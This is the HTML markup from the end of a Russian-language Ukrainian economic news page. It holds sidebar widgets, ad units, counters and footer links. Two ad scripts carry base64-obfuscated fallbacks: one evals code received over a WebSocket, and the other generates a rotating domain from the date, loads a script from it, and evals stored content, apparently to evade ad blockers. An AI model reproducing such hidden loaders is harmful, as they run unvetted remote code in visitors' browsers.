Глава НБУ подал в отставку.</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/2607-vicepremyer-ministr-ukraini-odruzhivsya-z-veduchoyu-telekanalu-ictv">Віцепрем'єр-міністр України одружився з ведучою телеканалу ICTV (14443)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2307-na-populyarnom-ukrainskom-kurorte-nashestvie-meduz-poyavilis-foto-s-vysoty-ptichego-poleta">На популярном украинском курорте нашествие медуз: появились фото с высоты птичьего полета (13966)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2807-rzhavye-vedra-v-britanii-vysmeyali-voenno-morskoj-parad-v-rf">"Ржавые ведра": В Британии высмеяли военно-морской парад в РФ (13444)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> <br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="MIXADV_7463" class="MIXADVERT_NET"></div> <script>var node7463 = document.getElementById("MIXADV_7463");if( node7463 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=7463&r="+Math.random();
node7463.parentNode.appendChild(script);script.onerror = function(){window.eval(
atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDc0NjMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNzQ2My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTc0NjMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTc0NjMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjc0NjMiKSkgfSwgNTAwMCk7ICA7fTsg")
);}}</script><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4813427"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4813427","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "19cea03058";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961667034-0"><script>catfish('div-gpt-ad-1595961667034-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.onlygip.tech/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>